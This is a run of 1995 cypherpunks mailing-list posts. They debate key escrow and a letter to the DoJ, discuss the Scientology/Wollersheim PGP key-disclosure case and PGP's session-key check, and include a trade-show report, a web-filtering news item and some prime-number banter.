>Not really.  Even if you could find an IDEA key that would produce the  
>desired output it would be hard to find a passphrase that would produce that  
>key when hashed.  One of the properties of one-way hash functions is that it  
>is difficult to find a plaintext that produces a given hash.  Hence the term  
>'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,  
>would require something like 2^64 operations), it would likely be long, have  
>8-bit chars, and would be impossible to type in.  It would be tough to  
>convince anyone that it was the real passphrase.
>
>
>andrew
>


There was a hack to pgp ui published a while back that would allow
someone decrypting a RSA encrypted file to print out the idea key.

Another feature of the hack allowed someone with the idea key to decrypt
an RSA PGP encrypted file ignoring the RSA headers and using the IDEA
key directly.

Using this software should allow the reciever of an RSA PGP encrypted
file to allow someone else to decrypt it (by giving them the IDEA key)
without exposing the secret key. The IV block check will  allow them to
check that they are using the correct idea key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Fri, 8 Sep 95 23:07:24 PDT
To: cypherpunks@toad.com
Subject: Open letter to Geoff Greiveldinger, DoJ
Message-ID: <199509090607.CAA02659@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I just posted the following.  I'll have to wait to see if the moderator
accepts it.

Date: Sat, 9 Sep 1995 01:11:06 -0400
From: Carl Ellison <cme>
To: risks@csl.sri.com
Subject: Open letter to Geoff Greiveldinger, DoJ

NIST (the National Institute of Standards and Technology) held a two day
public meeting on September 6 and 7, 1995 to discuss Software Key Escrow as a
possible means of achieving export of cryptography.

In the morning of 9/7, Goeff Greiveldinger of the Department of Justice gave a
description of the kinds of crimes which DoJ wants to use wiretapping to
solve.  He closed this litany of lawbreaking with the assertion that software
manufacturers don't want to provide products which allow such lawbreakers to
keep their criminal evidence hidden from law enforcement.

I'm sorry to disillusion you, Geoff, but I *do* want to make such systems.

Would you have Ryder stop renting trucks because some terrorist decided to
fill one with explosives and kill many innocent children?  Would you have
Americans stop making automobiles because bank robbers have been known to use
cars for getaways?  Would you have all new buildings constructed with FBI
microphones in every wall because some criminals meet in private rooms in
order to plan crimes?

When an American company sweeps its conference room for bugs, finds some and
destroys them, it doesn't matter whether those bugs were planted by industrial
spies or the FBI.  The company has a right to eliminate them.  When that
company ties two such conference rooms together by video-conference equipment
and encrypts the line between them using strong link encryption, it is
performing the same defensive operation in cyberspace.  It is protecting
itself from spies and it doesn't matter that the wiretaps it frustrates might
be illegal ones by industrial spies or legal ones by the FBI.  The right to
attempt to achieve privacy is a long-standing one in this country and not one
to allow to be lost.

When I design and build systems for privacy for my customers, I am providing
products for law-abiding, honest people.  I am aware of criminals, of course.
Criminals are the threats against whom I protect my customers.  These
criminals are usually not in the government but that doesn't mean that I
believe I should offer my honest customers up for a strip-search in
cyberspace.  The law enforcement agencies of this free country have no right
to expect blanket access to the ciphertext of citizens.  It will take
legislation to get that right and I will do everything in my power to keep
such legislation from passing.  Barring such legislation, I will make sure
that honest American citizens have cryptography with which to attempt to
maintain their privacy, even from the government.  We have the right to
attempt to keep a secret from government agencies and continuous demonstration
of that right is an important part of this free country.

On the other hand, I am sympathetic to law enforcement officers.  I have
several friends in that business.  I have asked my friends and acquaintances
who do surveillance (2 IRS agents investigating organized crime for tax
evasion; 2 undercover cops in Boston's highest drug neighborhood; 1 DEA agent
in the midwest) if they ever encounter encrypted communications or files.
They don't.  Neither does anyone in their offices.  Of course, even if they
did it would remain so important to preserve our right to attempt to keep
secrets from the government that their frustration would just have to be
accepted.  The fact that this isn't a real problem makes my decision that much
easier.  I am left with no moral qualms at all.

In summary, criminals are so few that I will not design for them.  I will not
treat my vast majority of honest users as if they were criminals just because
some criminal might someday use my product and frustrate you.

ObRisk: We run the risk of losing our fundamental right to attempt to keep a
secret from the government -- a practice we need to preserve in order to
protect ourselves from criminals in cyberspace.  There are powerful forces in
the US government attempting to cajole us into giving up that right.

[see http://www.clark.net/pub/cme/html/nist-ske.html for more on this subject]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 95 19:10:34 PDT
To: cypherpunks@toad.com
Subject: Web Exon A-rate
Message-ID: <199509090210.EAA17069@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



WS Journal, Sept. 8, 1995.


Cleaning the Web: Companies to Seek Pornography Blocker

Array of Technology Firms Will Join in Effort to Let
Parents Screen the Internet

By Jared Sandberg


Some of the high-tech industry's biggest companies are
banding together in a broad-based consortium to develop
a way for Internet users to screen out pornography and
other offensive material.


The group, whose creation is expected to be announced on
Monday, is believed to include International Business
Machines Corp. and Microsoft Corp., telecommunications
giants AT&T Corp. and MCI Communications Corp., on-line
firms America Online Inc. and Netscape Communications
Corp. Entertainment heavyweights Time Warner Inc. and
Viacom Inc. also have been approached.


People familiar with the plans said the consortium hopes
to develop industrywide standards for obscenity-blocking
technology as a way to forestall much-criticized
proposals from federal regulators. It amounts to an
effort to develop a voluntary Internet equivalent of the
"v-chip" that has been proposed as a way for parents
block sex-and-violence-laden TV programs.


The venture will pursue a system that would allow
Internet users -- such as teachers or parents -- to
prevent pornography from being accessed by children.


The group will be led by the World Wide Web Consortium at
the Massachusettes Institute of Technology, executives
said. The consortium, funded by roughly 80 companies,
aids in the development of the Web, the multimedia
portion of the Internet, by producing technical
specifications and software.


Various companies have worked on ways to shield children
from indecent material. The new consortium will pursue an
overarching method available to all Internet players --
software firms, access providers and on-line services.


MIT will coordinate this "umbrella organization to
prevent industry infighting," said one executive. "It's
aimed at creating a standard that all the software
companies can develop for." A separate project by
Microsoft and Netscape, together with two smaller firms,
SurfWatch Software Inc. and Progressive Networks Inc.,
will now be folded into the new consortium, another
executive said.


The effort follows such proposals as the antipornography
provision of Sen. James Exon (D., Neb.), which won
overwhelming support in the Senate and would slap prison
terms on people who make "indecent" remarks on-line.


Most of the proposals have been met with scorn from the
Internet industry. Executives have said that legislators
could cripple the commercial growth of the Internet
before it emerges from infancy.


------












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 8 Sep 95 20:32:43 PDT
To: cypherpunks@toad.com
Subject: [NOISE/Fun] some 'special' primes
Message-ID: <9509090332.AA06578@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I hope this is not extremely already know,... but, seeing on the list
a sig with someone claiming to have the 'last' prime, I played a bit
this nite and searched for the *first* alphabetically sorted prime
(once written as spelled, sorted like with unix's sort)
dependending on the language :

Easiest: English : 11 : eleven
A bit more fun : German : 811 (dunno how to write it, but it starts
with an "a")
Exotic one : slovenian: 10019 desettisocdevetnajst

And..... the tricky one, which I hope is the good one (challenge: find
one 'before') :
French (and possibly spanish/italian,...too) : 105 105 000 105 167
(it spells cent cinq mille cent cinq milliards cent cinq mille cent
soixante sept) [note that 'billion' is not used for numbers in common
language, and that soixante-dix has a - and not a space :-) ]

More languages ? better results anyone :-) ?

Regards
dl

ps: I used gnu MP lib for my hack when I hit the 2^32 limit, but it's
rather slow... (ok, its prolly due to my lasy prime algo too, but...)
is there some well-known fast mp lib to play around with primes ?
(should I look and extract PGP's ?)
- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
105 105 000 105 167

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFEKvXk52/beodHxAQH+cgQAwUzDczvIzXaBzYx/Q5oerXFZ/ABDjp8b
Sz20qgBmB3BP9jE8GbibqIF1FOExS2r3irg4PQHhUwuX7wWT/deo8KzWMrb3C2fi
X3kMbtWM9hQNHJ1mRpAE41M1NuHgk8xM43WbkZcLyYOPXXWSAAs0qc+bdNamtUDT
iujkF9fQxck=
=mkaz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Sat, 9 Sep 95 10:10:55 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails? (fwd)
Message-ID: <199509091707.KAA15642@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> >Tom Rollins writes:
> >>  If this is the file that the Co$ is trying to crack, then what the
> >>  is being asked for is a pass phrase that can be handed to the Co$
> >>  that will pass the PGP valid key check and still not decrypt the
> >>  data to anything usefull.
> >
> >Well, I don't have the PGP 'conventional' encryption format memorized, but  
> >there is probably a constant after the IV that is prepended to the data.  The  
> >constant is used to determine if the key is correct.  Since the conventional  
> >encryption runs in CFB mode and there is a full block of random IV at the  
> >beginning of the file, it is extremely unlikely that a key could be found  
> >that would properly decrypt only the first two blocks while leaving the rest  
> >unreadable...
> >
> >>  If Larry Wollersheim does have the valid key.  It would be a simpler
> >>  process to know what fake key to use and work it backwards through
> >>  the MD5 to arrive at an ascii string to produce the fake key.
> >
> >Not really.  Even if you could find an IDEA key that would produce the  
> >desired output it would be hard to find a passphrase that would produce that  
> >key when hashed.  One of the properties of one-way hash functions is that it  
> >is difficult to find a plaintext that produces a given hash.  Hence the term  
> >'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,  
> >would require something like 2^64 operations), it would likely be long, have  
> >8-bit chars, and would be impossible to type in.  It would be tough to  
> >convince anyone that it was the real passphrase.
> >
> >
> >andrew
> >
> 
> 
> There was a hack to pgp ui published a while back that would allow
> someone decrypting a RSA encrypted file to print out the idea key.
> 
> Another feature of the hack allowed someone with the idea key to decrypt
> an RSA PGP encrypted file ignoring the RSA headers and using the IDEA
> key directly.
> 
> Using this software should allow the reciever of an RSA PGP encrypted
> file to allow someone else to decrypt it (by giving them the IDEA key)
> without exposing the secret key. The IV block check will  allow them to
> check that they are using the correct idea key.
> 

Looking at the source code showes that all that is needed to
pass the PGP key check is for the first two blocks to decode
in such a way that the last 2 bytes of the IV match the 2
check bytes before the actual message. Thus the first 6 bytes
of the IV and the last 6 bytes of the next block need not
match the actual message.

There was a bug in the older versions of PGP that set the
IV to a constant instead of a random value when encrypting
with the "-c" option.

I made a mistake thinking that knowledge of the correct
key would help in creating a fake key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 9 Sep 95 07:08:41 PDT
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: Scientology/Wollersheim as test case for key disclosure
In-Reply-To: <199509090742.AA15129@ideath.goldenbear.com>
Message-ID: <Pine.PMDF.3.91.950909100445.541100226A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Sep 1995, Greg Broiles wrote:

> 
> the pleadings" (Fed. R. Civ. P. 26(a)(1)(B)). I don't see why
> Wollersheim couldn't comply with the discovery rules by providing 
> plaintext copies of all relevant information, unless for some reason
> the passphrase is itself relevant.
> 
Ah.  but if there is no plaintext, the question is whether you comply 
with the rule by providing the encrypted text rather than plaintext.  I 
would say you have to provide the plaintext in the absence of a legitimate 
privilege claim, but I don't recall a case to this effect (there is 
precedent for requiring translation of foreign language documents when 
the request is covered by an evidence conention; I don't recall if there 
are any such cases that fall purely under domestic US rules).  Anyone have 
chapter and verse?


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 9 Sep 95 11:00:49 PDT
To: cypherpunks@toad.com
Subject: Re: 9K P6
In-Reply-To: <199509082135.RAA26681@pipe2.nyc.pipeline.com>
Message-ID: <950909.114931.1m4.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jya@pipeline.com quotes an Intel press release:

> Today, by making it possible to ensure the safety, reliability,
> and performance of the weapons stockpile while foregoing nuclear
> testing, the Intel/Sandia teraflop computer can help the world take
> a further step back from the shadows of war into the light of peace.

Intel's PR department has a great future doing Gummint work.  This is a
stellar example of Doublespeak.  Kinda makes me nauseous.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFHGOBvikii9febJAQHd/QQAuGxuIEZDrAryaxcvANnpiHNJjVRcJT+D
YPjKdVdAPy/FN1fDLEkQeyJUPgzojDSsyyZnODIobT8uLBA36znodrlFYKBzFyxA
jpNYC4ef7DZU+Mm0NkoZN+3UY+GwaLc7Utfkg5eSj0e9awnbQ6+l56scwmCWZtF1
G+eOzU/i5wA=
=9giO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 9 Sep 95 12:41:21 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509091941.MAA04904@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:44 PM 9/8/95 -0400, you wrote:
>We wish!  We really wish!

"Fill that lawyer with a few more slugs of encryption!"

The argument that encryption will free us from all the legal ills of the
world is pretty specious.  If anything it will make more work for lawyers as
the non-clue-endowed portion of the world tries to come to terms with the
new technology.  They will make rules and subsets of rules and exeptions to
rules and variations to interpetations of rules that will make the current
set look like the rules to "chutes and ladders".  Part of the job of the
lawyer class is to guarentee the existance of work for other lawyers (as
well as themselves).  It does not depend on what the medium of exchange is.
Lawyers and government forces will try and figure out some way to try and
extract it from you.

The government is trying very hard to keep any scrap of power from creeping
away from them.  You can bet that they will try every thing they can think
of, rational and irrational, to regulate and control the wilds of
cyberspace.  They will pump up every imaginary boogieman to help them get
the public to swallow what they are fed.  By the time they figure out they
have been had, it will be too late.  Cypherpunks must be the syrup of ipecac
to the governments dose of poison to the body politic!  (I need to start
drinking more coffee in the morning.  I cannot believe I wrote that...)

Unfortunatly the public does not thrive on logic.  They had been trained to
react emotionally to things and not react logically.  I am not certain what
can be used to get them to realize why they need encryption.  Dispelling the
bogeymen is none need. The other thing is that the tools need to be made as
simple as possible.  The current tools for use require a fair bit of
technical understanding.  Until they have an integrated front-end that makes
it about as easy to use as America On-Line, encryption will not gain
widespread usage.  This is the type of code that needs to be written.
Making integrated tools like newsreaders and mail programs that support
strong encryption directly is what is needed for widespread use.  (As well
as being usable programs in and of themselves.  Many of the programs for
news and mail are crap.)  Making cryptography a "cool and fun thing to use"
will help dispell many of the myths and may help to defuse the government
created bogey men.  (Of course they will claim that it aids "criminals and
terrorists", but to them EVERYONE is a criminal and a terrorist.)  
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 9 Sep 95 13:03:58 PDT
To: cypherpunks@toad.com
Subject: Internet commerce mtg, Denver
Message-ID: <199509092000.NAA14106@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I went to an Internet commerce convention meeting in Denver
last week, and thought some here would be interested in 
some of the topics and companies. 

the most important company I saw at the meeting is called
"YellowNet". I knew this would happen someday, but this company
is attempting to build up a *world wide* online business
directory accessable over the web. they are trying to 
build up the infrastructure to handle up to 1M hits per
day. a rep told me they were going to go all out in a 
publicity blitzkrieg at the beginning of Oct. , but for
now they are getting ready for prime time. its currently
a private company but I suspect they may go public in
a year or two.

the rep told me something interesting: he said that every
Bell phone book is actually "seeded" with dummy names
so they can detect copyright infringers. if you come out
with a business directory, these Bells will just scan for
the fake names that they have inserted into their own listings.
if they find them, supposedly they can show them to a copyright
judge and he will immediately close down your operation and
fine you, almost no questions asked. I didn't know how much
of this really happens (the legal stuff sounded questionable
to me) but it is an interesting "real world" instance of
copyright terrorism prevention that the "information liberation
front" would have to contend with. 

the rep told me that they were willing to go to "phillipine
calling houses" that do nothing but contract out to companies,
and have the laborers dial the long lists of phone numbers
to verify them. as I understand it they exist and supposedly
the long distance is so cheap now that they are actually
profitable being run out of the phillipines or wherever.
he said his company was about to do this when
they found a national CD directory of businesses, and they
were grudgingly willing to license the CD informtion for the web pages.

anyway, cpunks, you may be interested in getting into
the ground floor of something like this. the yellow pages
are an *extremely* lucrative source of income for phone
companies and if they don't compete over the web, I think
they are going to become increasingly obsolete-- esp. when
the Web becomes accessable to the home more readily through
e.g. cable companies.

the URL: http://www.yellownet.com

what I am suspecting however is that these kinds of services
are going to be common, and it will not be that difficult to
get your *pointer* into them for free. as far as them offering
advertisements, though, I can't see how they could charge
much more than a standard web site service charge for some
pages. in other words, the days of hundreds of dollars for
a display ad are probably not going to happen on the web,
IMHO. and I don't see how they could charge for mere pointers
at all, given that the competition will probably give them
away.

--

the other major companies at the show were generally large and 
small internet providers, and a lot of web page consulting firms
(large and small). various network connection providers &
consultants, etc.

another thing I would like to clue everyone in on, if it
isn't already obvious: the Web is going to go crazy as
companies realize they can have dynamic forms to serve
customers without any clerks required. this is going to 
be a *very* hot area of development over the next few
years IMHO.

 it is really not that big of deal to have
an inert "online brochure" but the technical capability
required to do programming behind forms to interface with
company databases is not trivial, and I think this is
going to become an extremely hot occupation over the next
few years. in other words, programmers who can customize
web sites to interface to the existing company's databases
and computer infrastructure will be very valuable. this
is called "CGI"; many of you are probably already experts
in it. (if you are, I'd like to talk to you about an 
application I'm trying to write...)

examples of this are infinite, but a few: a customer could
query the company inventory, find what stores are nearest
to his home, find what store has what he wants in stock immediately,
check on special prices and discounts of the moment, etc.
he might be able to put himself on a company mailing list,
etc.  so far I have not seen this very widespread, these
customized web applications, but I think they are really
going to proliferate massively.

I have also been seeing a lot of excitement over Java, and
I think this really has the potential to become a "net
standard binary interchange format". however I think the
day when the Java apps are proliferating all over the
net will be quite awhile away (6 mos or more at least) and
that businesses are still probably going to want to use
the more prosaic form interfaces for compatility 
and simplicity.

Java is really starting out right, in that it begins as
day 1 as a total free, open standard. Sun and Netscape are
not claiming burdensome proprietary rights to it. this
makes it amazingly attractive. the market has shown repeatedly
that it will often go with an inferior open standard in
preference to a technologically superior closed one. (and
IMHO with good reason.. the market is pretty rational, just
not in ways technophiles necessarily expect).

another thing I saw that Sun is promoting: they now have
Web authoring applications that require almost no HTML
expertise whatsoever. you can drag and drop pictures where
you want them in the documents etc.  I suspect this may
become the preferred way to work on web documents in the future
to the point that people who actually memorize all the HTML
commands may be in the minority. this actually argues in favor
of a HTML that is not necessarily that pretty or syntactically
consistent (of course, both aspects have already been pretty
much lost in the mad rush to add new features anyway). 

--

another thing I'd like to point out is that there are a lot
of hackers here with specialized knowledge into the web
and perl and other tools, and in our culture (the cypherpunk
list, e.g.) these things are considered pretty simple, mundane,
and obvious, but there is
an enormous business culture out there with a lot of money
and not very many clues about this technology. the consulting
opportunities for "small fries" are becoming very attractive
and widespread. it is easy for us to say, "oh, that's no big
deal, why would anyone pay money for that??" but in fact what
is happening is that people are paying *big* money for simple
things like HTML expertise.

there were a total of about 50 classes at this show, and you'd
be really surprised how many were on fairly basic subjects like
"what is the internet? what is the web? what can it do for me?"
etc.  however many of these classes focused on secure banking
transactions.

and cryptographic expertise will probably move to the forefront
of job requirements in about a year for these kinds of jobs, I
would imagine. they will probably tend to emphasize the need
for background in security related applications. right now there
are a lot of toy, insecure applications but it is only a matter
of time before people realize that if you really want to get
serious, you have to have cryptography tied in and sharp people
to plug all possible security holes, and you don't want stuff
made out of "bubblegum and baling wire".

so it appears that cypherpunks are really positioned on the crest 
of a tidal wave!! any of "us" who have been on the list in the
pre-web era are beginning to feel like old fogeys from the 
prehistoric era!! it seems that cyberspace for the elite was
born with the Internet, but "cyberspace for the unwashed masses"
was born with the Web.


--Vlad Nuri






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 9 Sep 95 13:07:51 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
Message-ID: <199509092006.NAA05181@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat F A R R E L L wrote:
 
/ Subject line is bull*&^&, IMHO, of course

Hey everyone has an opinion.
 
 In message Sat,  9 Sep 1995 16:40:00 UTC, an116512@anon.penet.fi  writes:
 
 > to make my point: why is pat farrel helping the nsa and nist make
 
 /Learn to spell my name. It is on my .sig, my keys, and in my userid.
 /We blockheaded, Irish Catholic Americans are damn proud of our name.
 /Farrell's (along with other cheap Irish labor) built the railroads
 /from Chicago west.  Please spell it correctly, even if you are flaming me.
 
F A R R E L L

M O U S E

 > hey why not just write the escorw code for them!!!???
 > is mr farrel just being naive or is does he realize who hes working for?
 > sorry to single him out but this is just an example of what im talking
 > about.
 
 /I doubt that this clown deserves a response, but...
 
Then shut up.

 /There were a number of cypherpunks there. I can't speak for all,
 /but I expect movites include:
 

 /- attempting to clarify vague and confusing wording so we could
 /understand what they wanted.
 
'k

 /- seeing that working with them, rather than yelling at their stupidity,
 /has a higher chance of getting results.
 
Beware of compromise, you become the rag puller for the rapist.

/ - we got to meet influential folks from industry who agree with us.
 
'k

 /- some of us aren't completely apposed to CKE. I think it has value.
 /If we could convert their plan for GAK into CKE, it would be a big win,
 /well worth the effort.

Yea right. 

/ - they are going to promulgate a FIPS PUB standard next week, whether I
/like it or not, and whether I help or not. It is better to have that
/standard understandable and clear than fuzzy and subject to subective
/evaluation. 

Clear as any government forced standard can be. 

/ - getting preposterous misstatements into the formal Federal Register so
/ we can quote it back to them in the congressional hearings. Mr Geoff
/ Greivelddinger's words should be handy to quote, for one example.
 
'k

 /- there are lots more, but I doubt that I can convince this clown.
 
Then shut up.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 9 Sep 95 11:43:35 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology/Wollersheim as test case for key disclosure
In-Reply-To: <Pine.PMDF.3.91.950909100445.541100226A-100000@umiami.ir.miami.edu>
Message-ID: <9509091842.AA13158@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



One solution to this problem would be to modify PGP so that the session key for 
the document was released rather than the passphrase for the public key. The 
former would provide only read access, the latter would allow th scientologists 
to forge Wollerstein's signature on other material. In addition many of the 
documents may be subject to privillege.


I would have thought that there would be grounds to oppose the court action in 
any case on various grounds, not least the previous judgement which the 
Scientologists lost and have failed to pay the damages awarded. There might also 
be grounds to oppose disclosure if the case was brought in order to obtain 
secret material rather than for legitimate purposes.

In the UK the judge can be asked to review documents and decide whether they 
should be made avaliable.

Surely the disclosure laws would work in wollerstein's favour in any case. He 
can request disclosure of internal Scientology material. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Sat, 9 Sep 95 12:50:58 PDT
To: cypherpunks@toad.com
Subject: Re[2]: [NOISE/Fun] some 'special' primes
Message-ID: <v01510101ac77aaa17723@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


>     No, it's
>
>     ocht hundert elf
>
>     Skip
>

acht, not ocht.

DJK






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 9 Sep 95 13:52:23 PDT
To: cypherpunks@toad.com
Subject: Re: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.950909143732.672K-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

well well well,

our anon friend flames away with 'shut up' 'shut up' 'shut up'.  aint 
free speech nice.

it's so nice to see the remailers put to such good use!  if you are going 
to post flames and worthless commentary the least you could do is sign 
the mesg so we can killfile you.

mr. anon, perhaps you've noticed that the govt pretty much does what they 
want.  in this instance we have the chance to have some influence (albeit 
minor) on what the outcome is.  or, perhaps you're just some TLA stooge 
sent to disrupt our plans to take over the world.  

i suppose you think we should just tell the govt to 'shut up'.  yup, that 
will do the trick.  they'll just say, 'gee, sure.  sorry we tried to take 
away your privacy.  our fault.'  right.  the govt would prefer a nice 
docile populace that goes to work and pays their taxes without talking 
back.  

in any event, this isn't the first grade.  we don't tell people to 'shut 
up'.

- -pat, another irish, but ex-catholic, ridiculously cheap labor involving 
      biochemistry

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFH+Y03Qo/lG0AH5AQFncAP/dtUG1rhbbqDDo5fSQfK85e1YrlUWdq7w
fK5v5baDXfKkZG3+O3oxgiggcQo+uFB+EXc7KP2LSpSbUf4GCF1bZj84OaNk7bZY
RqsUSQ6PMUgAbrLynW5fjlSlkGCsRb1m0OOmNAu31K2bv3cfVSlq6ZHdXFcM3j5G
5UtqwoMW17A=
=5CTQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 9 Sep 95 11:59:27 PDT
To: cypherpunks@toad.com
Subject: Sigh Re: not a flame please read and think about this
Message-ID: <53877.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject line is bull*&^&, IMHO, of course

In message Sat,  9 Sep 1995 16:40:00 UTC, an116512@anon.penet.fi  writes:

> to make my point: why is pat farrel helping the nsa and nist make

Learn to spell my name. It is on my .sig, my keys, and in my userid.
We blockheaded, Irish Catholic Americans are damn proud of our name.
Farrell's (along with other cheap Irish labor) built the railroads
from Chicago west.  Please spell it correctly, even if you are flaming me.

> hey why not just write the escorw code for them!!!???
> is mr farrel just being naive or is does he realize who hes working for?
> sorry to single him out but this is just an example of what im talking
> about.

I doubt that this clown deserves a response, but...

There were a number of cypherpunks there. I can't speak for all,
but I expect movites include:

- attempting to clarify vague and confusing wording so we could
understand what they wanted.

- seeing that working with them, rather than yelling at their stupidity,
has a higher chance of getting results.

- we got to meet influential folks from industry who agree with us.

- some of us aren't completely apposed to CKE. I think it has value.
If we could convert their plan for GAK into CKE, it would be a big win,
well worth the effort.

- they are going to promulgate a FIPS PUB standard next week, whether I like
it or not, and whether I help or not. It is better to have that standard
understandable and clear than fuzzy and subject to subective evaluation.

- getting preposterous misstatements into the formal Federal Register so
we can quote it back to them in the congressional hearings. Mr Geoff
Greivelddinger's words should be handy to quote, for one example.

- there are lots more, but I doubt that I can convince this clown.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 9 Sep 95 14:00:04 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <199509092058.OAA21485@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>hack..print out the idea key.

>using the IDEA key directly.

This would be a neat addition to PGP. It would be fun to take random
data and slap PGP headers on it, and maybe throw in a real encryption
that doesn't report the true IDEA key. It would be a valuable trick
for StealthPGP / stego systems, if we ever need it.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFGJicLa+QKZS485AQH9vgMAwnofHnb7EOpcWVtCp9lWdySM2W7wAnQ5
wNvsKWrEW2aCK+lf1fvNUypLwXN5twA9W1ZLqVOqpJZMjLSVnoo9ulTOJ45hoF2p
BZQGAaFqlnl6IQHbmA7l2vBt55GfWAnS
=lDmq
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael <mike@uac.net>
Date: Sat, 9 Sep 95 12:24:45 PDT
To: sharborth@hai-net.com
Subject: Re: Re[2]: [NOISE/Fun] some 'special' primes
In-Reply-To: <9508098106.AA810686211@houston_cc_smtp.hai-net.com>
Message-ID: <199509091924.PAA26191@mail1.uac.net>
MIME-Version: 1.0
Content-Type: text/plain



>     ocht hundert elf

How about a compromise...

      acht hundert elf


--Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Sat, 9 Sep 95 12:21:44 PDT
To: mike@uac.net>
Subject: Re[2]: [NOISE/Fun] some 'special' primes
Message-ID: <9508098106.AA810686211@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     No, it's
     
     ocht hundert elf
     
